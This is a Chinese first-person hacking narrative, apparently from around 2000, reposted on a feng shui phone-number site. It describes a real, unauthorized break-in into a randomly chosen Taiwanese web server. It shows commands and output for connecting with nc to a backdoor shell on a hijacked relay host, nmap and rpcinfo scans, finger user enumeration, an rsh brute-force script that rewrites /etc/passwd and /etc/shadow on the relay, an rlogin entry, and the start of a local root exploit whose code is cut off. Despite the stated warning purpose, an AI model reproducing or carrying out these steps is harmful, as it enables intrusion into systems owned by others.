135风水号码吉凶网联系电话
当前位置: 首页 >> 文摘分享 >> 正文

我是怎么进入他人计算机的


本文的写作目的仅仅是为了给某些粗心大意的网络管理人员一个警告——internet是有趣但十分脆弱的,当你的计算机放在互联网上给人们提供信息与服务的同时,会引来网络中的“好奇者”的窥探。而安全性与便利性是一对矛盾……在你对自己的网络做了一个安全策略考量之后,你应该确定你愿意以多大的风险来使用一些方便的服务,当然这些服务——比如rlogin,可能只会使你少输入一次密码……
首先是确定目标——撞大运乱挑一个吧,试试能不能成功……呵,于是登上yahoo,上taiwan的站点小遛了一下……唔,这个还不错,我们姑且称其为www.targe.com……还是先ping一下看看情势如何——别碰上有墙的就逊了……

C:\>ping www.targe.com

Pinging www.targe.com [111.111.111.111] with 32 bytes of data:

Reply from 111.111.111.111: bytes=32 time=621ms TTL=241
Reply from 111.111.111.111: bytes=32 time=620ms TTL=241
Reply from 111.111.111.111: bytes=32 time=611ms TTL=241
Reply from 111.111.111.111: bytes=32 time=591ms TTL=241

速度还是很快的嘛……那就开始吧……

先登上某台跳板台湾的机器——这样安全一些,不会留下你自己的IP……(当然,说句题外话——这样要追查到还不是很困难,曾经有个朋友同我说过,南方某大学一次被黑,种种迹象都表明黑*客来自美国,IP、更改后主页上留下的话语……朋友受托去补漏查源,发现那IP是美国一个提供免费shell的服务供应商……于是申请了一个shell,通过一系列动作成为root,查看系统日志——真相大白,IP居然指向那家大学自身)。

通过跳板还有一个好处——如果你的尝试失败,在系统日志里留下来的是台湾本土的IP,这样的登陆失败命令比较不会引起系统管理员的注意……

C:\>nc ***.***.***.*** 12345

就登上跳板了,12345端口里我预留了一个suid的shell……

好了,祭起宝刀——nmap……

# ./nmap -sT -O 111.111.111.111

Starting nmap V. 2.3BETA12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)

Interesting ports on www.targe.com (111.111.111.111):
Port State Protocol Service
7 open tcp echo
9 open tcp discard
19 open tcp chargen
21 open tcp ftp
23 open tcp telnet
25 open tcp smtp
37 open tcp time
79 open tcp finger
80 open tcp http
111 open tcp sunrpc
443 open tcp https
512 open tcp exec
513 open tcp login
514 open tcp shell
515 open tcp printer
540 open tcp uucp
3306 open tcp mysql

TCP Sequence Prediction: Class=random positive increments
Difficulty=55346 (Worthy challenge)
No OS matches for host (If you know what OS is running on it
…………
…………
Nmap run completed -- 1 IP address (1 host up) scanned in 17 seconds

 

 

唔,运气还不错,提供的服务不少,估计漏也少不到哪儿去……只是没判断出系统
类型,这些服务里看上去可以利用的有:

Port State Protocol Service

21 open tcp ftp
25 open tcp smtp
79 open tcp finger
80 open tcp http
111 open tcp sunrpc
512 open tcp exec
513 open tcp login
514 open tcp shell
540 open tcp uucp
3306 open tcp mysql

最近rpc攻击非常流行,原因之一恐怕是方便易行——只要存在漏洞,远程就可以
得到一个rootshell……甚至对计算机完全不懂的外行也能轻易实施,呵,那咱们
来看看这个111 port的sunrpc里有什么奥妙吧……

# rpcinfo -p 111.111.111.111&
21404
# program vers proto port service
100000 2 tcp 111 rpcbind
100000 2 udp 111 rpcbind

咦,看来没戏唱哦……好在还有那么多服务,待偶慢慢试来……
看看是什么FTP服务器软件吧,说不定有远程溢出的漏洞呢 # ./nc 111.111.111.111 21
#

乖乖龙的东,什么输出也没有就关上了,这是如何一回事?

C:\>ftp 111.111.111.111
Connected to 111.111.111.111.
Connection closed by remote host.

呵呵,看来过滤掉了嘛……怎么办?看看25端口是运行什么SMTP服务的吧……

# ./nc 111.111.111.111 25
220 ***-***-***-*** ESMTP Sendmail 8.9.3/8.9.3; Wed, 5 Apr 2000 08:56:59 GMT

Sendmail 8.9.3/8.9.3?好象没有什么致命的漏洞呀……

看看是什么WEB服务器先……

# (echo "head /http/1.0";echo;echo)./nc -w 3 111.111.111.111 80





Method Not Implemented

  head to /http/1.0 not supported.

  Invalid method in request head /http/1.0

 

 

--------------------------------------------------------------------------------

  Apache/1.3.9 Server at ***-***-***-*** Port 80

  

阿帕奇这个版本的东东至少偶的印象中没有什么“死穴”……

好在开了finger,俺就土土地先把用户列表弄出来吧……

finger O@www.targe.com

[www.targe.com]

root
aaa
bbb
ccc
ddd

总算有点收获……,那么下一步该做什么呢?既然这台主机开了512、513、514的r系列服务,那就值得尝试一下,说不定哪个偷懒的家伙直接在.rhosts里设了+ username

那我就爽了……

顺手写了个shell script,让它去一个一个地尝试rsh命令,传到肉鸡上

# chmod 700 rsh.sh
# nohup ./rsh.sh www.targe.com

它会自动地在/etc/passwd和/etc/shadow里加上finger出来的用户名,然后su过去,再对远程目标111.111.111.111执行rsh命令,成功则返回该用户名……然后将备份的passwd和shadow再拷回去……删除临时文件,生成报告文件……(或许是我对.rhosts的理解还有问题,有时我在机里加上+ +但rcp时还会报Permission denied或者connectrefused,所以干脆都su成用户——或许太笨;)我便再去MUD里当我的大虾了……半个小时后回来,登上肉鸡,读取报告文件.rsh.txt

 

 

# cat ./.rsh.txt
ccc

hehe,非常抱歉,看来俺得到一个shell了……

进去看看……

# rlogin -l ccc 111.111.111.111

Last login: Fri Mar 24 19:04:50 from 202.102.2.147
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

FreeBSD 3.2-RELEASE (GENERIC) #0: Tue May 18 04:05:08 GMT 1999

You have mail.

呵,原来是FreeBSD 3.2-RELEASE呀,感觉不错,进来了,看看我的权限如何吧……

> id
id
uid=1003(ccc) gid=1003(ccc) groups=1003(ccc)

看来能做的事还相当有限噢……再看看系统里有没有别人先……

> w
w
9:03PM up 6 days, 2:37, 3 users, load averages: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE WHAT
ccc p0 **.**.***.*** 6:04PM 2:41 -tcsh (tcsh)

不错,就我自在逍遥……看看passwd吧……

> cat /etc/passwd
cat /etc/passwd
root:*:0:0:Charlie &:/root:/usr/local/bin/bash
aaa:*:1005:2000::/home/www:/usr/local/bin/tcsh
bbb:*:1006:1006::/home/bbb:/usr/local/bin/tcsh
ccc:*:1003:1003::/home/ccc:/usr/local/bin/tcsh
ddd:*:1008:1008:ddd:/home/www:/usr/local/bin/tcsh
eee:*:1009:1009:eee:/home/eee:/usr/local/bin/tcsh

很明显/home/www就是www用户的主目录了……先看看俺ccc对该目录有没有写权限

> echo test >/home/www/test
test: Permission denied.

看来如果想改他的主页,还得另外想办法啦……不过都已经有了一个用户shell了,最高权限其实也只有一步之遥啦,好吧,翻翻数据库里有什么关于FreeBSD 3.2的记录,看来东西不多呀……而且有些还是安装外来软件包之后才带来的风险……

先看看有没有编译的权限再说吧,否则还得找一台BSD来编译……

> ls /usr/local/bingrep gcc
gcc

一般情况下自己安装的gcc是会在这个目录的啦,否则最好find一下比较保险。

这下方便了……可以直接传代码上来试……试了几个之后我找到这么个东西:

/* by Nergal */
#include
#include
#include
#include
#include
#include
#include
#include
#include

 

 

上一篇:网络保护和入侵探测产品SessionWall技术概览

下一篇:一次入侵过程的公开分析

点此返回文摘分享

点此返回135风水号码吉凶网首页

号码蕴藏的秘密

吉祥手机号码浅析

教你如何选择大吉大利的号码

选择手机号码 、电话号码等数字的吉祥号码算法

一切号码都储存了主人的信息

最准周易预测电话方法(1)

最准周易预测电话方法(2)

催旺桃花的手机号码

今年哪些手机号码最旺气

12生肖手机颜色风水禁忌 

今年带啥数字手机号码最旺

今年最旺运的手机号码

从手机号码中看姓名学

从电话号码测沟通秘籍

今年哪些手机号最旺财运

你的手机号码“招桃花”吗? 

你的手机从风水角度看是福星还是祸害?

你的手机尾号招桃花吗? 

让手机颜色为你改变运程

根据生肖选对手机号码添好运 

根据十二生肖属相选择大吉大利的吉祥手机号码

手机号码预示你的爱情期限 

从手机号码测你的人际关系

从手机号码看男人聊天的爱好

用手机号码测你恋爱运程

通过手机号码测试8月桃花运

手机号码跟姓名学怎么搭配

分析手机号码预测你11月桃花运

应该怎样才能买到一个大吉大利的手机号码?

用手机号码占卜你的爱情期限

手机外形、颜色、号码开运宝典

手机号码是否影响了你的运势

手机号码桃花灵数计算方法

手机号码尾数暗示你的爱情期限

手机号码尾数占卜命运吉凶

手机颜色帮助增进运势

五月最旺桃花运的手机号码

幸运手机号码大占卜

个股周易预测奇门起局方法

股票卖点周易分析要领

股市用周易梅花易数绝算法简介

周易奇门预测股市经验

周易小成图预测股市方法

应用周易八卦炒股票

股票中周易三爻卦的实用预测

周易预测股票的方法1

周易预测股票的方法2

周易预测股票指数

奇门企业发展规划预测纲要

阳宅奇门日课

奇门日课与奇门催财

奇门预测天气 升学秘法

奇门运筹与择吉

奇门择日 同日不同时 一家平安一家灾 

月家奇门股市用法经验

从女子面相看性器官及性欲

面相常用断法

如何解灾化煞并改变运气的科学之道

手相口诀

手相篇 预测人生

相理实战经验集锦

相面部位秘诀

相学中的痣相研究

痣对人生的影响

痣对人生的影响力

《周易》时空象数易占实例欣赏

周易六十甲子纳音表 

大师教你用周易催旺桃花运大秘诀!

12地支与现代时间对应.在预测股票中应用 

2010年结婚吉日一览表

避邪的知识

改善命运的原理与唯一的方法

关于梦境

汉字可测万事万物

黄勇智疑难化解趋避法

婚姻大利月周易择日

简单方法促进百年好合夫妻缘分

《结婚看日子的六用六不用》

如何择吉日

你了解自己吗?

汽车与人的运程

巧用二十四时辰避凶煞.为人类造福

周易日课神杀传真

喜神財神方位

如何选择黄道吉日 1

三百六十行

邵伟华上了中国教育电视台!

生活中的周易预测方法引用

十三个常见梦境的解析

细说八字推命不能决定的因素

详细选日择吉

消杀业得大富贵的金刚经

择日学引用

怎样看结婚日子

中国数术学万事三角定律基础知识(一)

诸葛亮马前课指算法预测